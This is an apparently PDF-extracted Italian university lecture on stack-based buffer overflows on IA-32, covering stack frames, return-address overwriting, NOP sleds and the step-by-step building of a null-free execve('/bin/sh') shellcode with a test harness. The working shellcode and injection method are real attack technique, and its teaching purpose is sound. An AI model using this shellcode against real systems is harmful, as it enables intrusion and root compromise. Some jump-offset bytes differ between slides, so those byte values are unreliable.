ICT security 2002/ Buffer Overflows (stack based) Alberto Ornaghi Lorenzo Cavallaro

ICT security 2002/20032 Table of contents Introduzione allIA-32 Introduzione allIA-32 Problema Problema Code Injection Code Injection Shellcode Shellcode

ICT security 2002/ Introduzione

4 Record di attivazione Return Address - E lindirizzo a cui viene ceduto il controllo una volta terminata lesecuzione della funzione. Base Pointer - E il contenuto del registro EBP al momento della chiamata alla funzione. Rappresenta il puntatore al record di attivazione precedente che deve essere ripristinato al termine della funzione ret address base pointer automatic variables... high low

ICT security 2002/20035 Sullo stack int foo(int a, int b) { int i = 5; return (a + b) * i; } int main(int argc, char **argv) { int c = 3, d = 4, e = 0; e = foo(c, d); printf(e = %d\n, e); } 4 3 high low stack ret address base pointer 5

ICT security 2002/20036 RDA innestati int foo(int a, int b) { bar(a, b); } int bar(int a, int b) {... } int main(int argc, char **argv) { foo(c, d); } d c high low b a ret address base pointer ret address base pointer

ICT security 2002/20037 Registri della CPU EIP: instruction pointer puntatore allistruzione successiva EBP: frame pointer puntatore riferito alla base del record di attivazione (fisso) ESP: stack pointer puntatore riferito al top della stack (mobile) d c high low ret address base pointer b ret address base pointer a

ICT security 2002/20038 Prologo ed epilogo Prologo: Prologo: push %ebp(salva %ebp) mov %ebp, %esp(sposta %esp) Epilogo Epilogo leave(ripristina %esp e %ebp) ret(ripristina %eip)

ICT security 2002/20039 Variabili automatiche Int foo(int a, int b) { int i, j; char buf[9]; … } Lallineamento di default sullo stack e a double word (4 byte) I buffer vengono estesi per essere allineati a 4 byte b a high low ret address base pointer i j buffer pad

ICT security 2002/ Problema

11 Situazione normale int foo(int a, int b) { int i, j; char buf[9]; i = 5; j = 123; strcpy(buf, sicurezza); } b a high low ret address base pointer s i c u r e z z a B A 7A

ICT security 2002/ Situazione critica int foo(int a, int b) { int i, j; char buf[9]; i = 5; j = 123; strcpy(buf, sicurezzabcde); } b a high low ret address base pointer 5 e s i c u r e z z a b c d A 7A Buffer Overflow

ICT security 2002/ Situazione molto critica int foo(int a, int b) { int i, j; char buf[9]; i = 5; j = 123; strcpy(buf, sicurezzaaaabbbbcccceeeeffff); } b a high low ret address base pointer A 7A Ret Overflow Segmentation fault... EIP = 0x

ICT security 2002/ Code Injection

ICT security 2002/ Modifica del ret address b a high low 0xbffffcab 0xbffffca7 0xbffffc8b 8B FC FF BF int a = 3; int b = 5; int e; e = foo(a, b); printf(%d\n, e); ret address base pointer ret addr

ICT security 2002/ Guessing del ret addr (1) Non esiste un algoritmo efficiente per trovare il ret addr Procediamo empiricamente tenendo conto che: il S.O. usa memoria virtuale e paginazione 0xbfffffff 0xbffffffb 0xbffffff7 0xbffffff3 0xbfffffff 0xbffffffb 0xbffffff7 0xbffffff3 Processo 1Processo 2 high low

ICT security 2002/ Guessing del ret addr (2) env argv RDA main RDA foo high low Limmagine dei processi e cosi strutturata: Limmagine dei processi e cosi strutturata: RDA bar offset fisso offset variabile

ICT security 2002/ Guessing del ret addr (3) lo stack pointer (esp) e una buona base dalla quale poter togliere (o aggiungere) un offset; quindi lindirizzo cosi ottenuto e un buon candidato come retaddr del programma vulnerabile. buf[4] buf[0] a esp ret addr b offset (8) high low

ICT security 2002/ Problematiche Le funzioni di copia per le stringhe (strcpy, gets, ecc) copiano fino al primo NULL byte (terminatore per le stringhe). Le funzioni di copia per le stringhe (strcpy, gets, ecc) copiano fino al primo NULL byte (terminatore per le stringhe). Il codice iniettato non dovra contenere NULL byte Il codice iniettato non dovra contenere NULL byte code[] = \xeb\x2a\x5f\xc6\x47\x07\x00\x89\x7f\x08\xc7\x47; strcpy(buf, code); buf = \xeb\x2a\x5f\xc6\x47\x07

ICT security 2002/ Facilitazioni Per aumentare la probabilita di trovare il ret addr e possibile preparare una pista di atterraggio di NOP (0x90) (istruzione macchina che non fa nulla). Per aumentare la probabilita di trovare il ret addr e possibile preparare una pista di atterraggio di NOP (0x90) (istruzione macchina che non fa nulla). ret address CODE INJE ret addr allargato CTED

ICT security 2002/ Struttura del buffer Il buffer che verra iniettato nel programma vulnerabile avra una struttura simile a questa: Il buffer che verra iniettato nel programma vulnerabile avra una struttura simile a questa: NOP EXECUTABE CODERET ADDR code[] = \x90\x90\x90...\xeb\x2a...\x8d\xfc\xff\xbf; attenzione !!

ICT security 2002/ Considerazioni... Il buffer potrebbe essere troppo piccolo per contenere un codice utile Il buffer potrebbe essere troppo piccolo per contenere un codice utile Lo stack potrebbe non essere eseguibile Lo stack potrebbe non essere eseguibile Il code puo essere messo in qualsiasi punto della memoria (non solo sullo stack, e non solo nel buffer) Il code puo essere messo in qualsiasi punto della memoria (non solo sullo stack, e non solo nel buffer)

ICT security 2002/ Lo shellcode

ICT security 2002/ exec.c #include int main() { char *shell[] = { "/bin/sh", NULL }; execve(shell[0], shell, NULL); }

ICT security 2002/ Disasm main push %ebp mov %esp, %ebp sub $0x18, %esp movl $0x809cd00, 0xfffffff8(%ebp) mov 0xfffffff8(%ebp), %eax and 0xfffffff0, %esp mov %eax, 0xfffffff0(%ebp) push %eax push $0x0 movl $0x0, 0xfffffffc(%ebp) lea 0xfffffff0(%ebp), %eax mov 0xfffffffc(%ebp), %edx push %eax mov %edx, 0xfffffff4(%ebp) push 0xfffffff0(%ebp) call 0x804cab0 $0x0 ($0x809cd00)$0x809cd00 base pointer $0x809cd00

ICT security 2002/ Disasm execve mov $0x8(%ebp), %edi mov $0xc(%ebp), %ecx mov $0x10(%ebp), %edx mov %edi, %ebx mov $0xb, %eax int $0x80 $0x0 ($0x809cd00)$0x809cd00 ret address base address

ICT security 2002/ registri mov $0x8(%ebp), %edi mov $0xc(%ebp), %ecx mov $0x10(%ebp), %edx mov %edi, %ebx mov $0xb, %eax int $0x80 eax = 0xb ebx = /bin/sh ecx = (/bin/sh, NULL) edx = (0x0) sh-2.03# id uid=0(root) gid=0(root) groups=0(root)

ICT security 2002/ Lo shellcode eax = 0xb ebx = /bin/sh ecx = (/bin/sh, NULL) edx = (0x0) Supponiamo di avere lindirizzo sullo stack di /bin/sh nel registro %edi movb $0x0, 0x7(%edi)#terminazione movl %edi, 0x8(%edi)#indirizzo movl $0x0, 0xc(%edi)#NULL lea 0xc(%edi), %edx#envp NULL lea 0x8(%edi), %ecx#array mov %edi, %ebx#/bin/sh mov $0xb, %eax int $0x80#syscall

ICT security 2002/ Lo shellcode edi = /bin/sh Come troviamo lindirizzo sullo stack di /bin/sh ??? jmp string_addr after_jmp: pop %edi [...] string_addr: call after_jmp.string \"/bin/sh\" Shellcode pagina precedente

ICT security 2002/ Opcode dello shellcode jmp string_addr # 0xeb 0x1e after_jmp: pop %edi # 0x5f movb $0x0, 0x7(%edi) # 0xc6 0x47 0x07 0x00 movl %edi, 0x8(%edi) # 0x89 0x7f 0x08 movl $0x0, 0xc(%edi) # 0xc7 0x47 0x0c 0x00 0x00 0x00 lea 0xc(%edi), %edx # 0x8d 0x57 0x0c lea 0x8(%edi), %ecx # 0x8d 0x4f 0x08 mov %edi, %ebx # 0x89 0xfb mov $0xb, %eax # 0xb8 0x0b 0x00 0x00 0x00 int $0x80 # 0xcd 0x80 string_addr: call after_jmp # 0xe8 0xd1 0xff 0xff 0xff.string \"/bin/sh\"

ICT security 2002/ Eliminazione null bytes movl $0x0b, %eax { xorl %eax, %eax movb %0x0b, %al movb $0x00, 0xc(%edi) { xorl %eax, %eax movb %al, 0xc(%edi)

ICT security 2002/ Shellcode finale jmp string_addr # 0xeb 0x18 after_jmp: pop %edi # 0x5f xorl %eax, %eax # 0x31 0xc0 movb %al, 0x7(%edi) # 0x88 0x47 0x07 movl %edi, 0x8(%edi) # 0x89 0x7f 0x08 movl %eax, 0xc(%edi) # 0x89 0x47 0x0c lea 0xc(%edi), %edx # 0x8d 0x57 0x0c lea 0x8(%edi), %ecx # 0x8d 0x4f 0x08 mov %edi, %ebx # 0x89 0xfb movb $0xb, %al # 0xb0 0x0b int $0x80 # 0xcd 0x80 string_addr: call after_jmp # 0xe8 0xde 0xff 0xff 0xff.string \"/bin/sh\"

ICT security 2002/ Testing dello shellcode char shellcode[] = "\xeb\x1d\x5f\x31\xc0\x88\x47\x07\x89\x7f\x08\x89 \x47\x0c\x8d\x57\x0c\x8d\x4f\x08\x89\xfb\xb0\x0b \xcd\x80\xe8\xde\xff\xff\xff/bin/sh"; int main() { void (*f)(void) = (void (*)(void))shellcode; f(); } sh-2.03# id uid=0(root) gid=0(root) groups=0(root)

ICT security 2002/ –Lorenzo Cavallaro –Lorenzo Cavallaro –Alberto Ornaghi –Alberto Ornaghi Mailing list del corso (per domande tecniche) Mailing list del corso (per domande tecniche)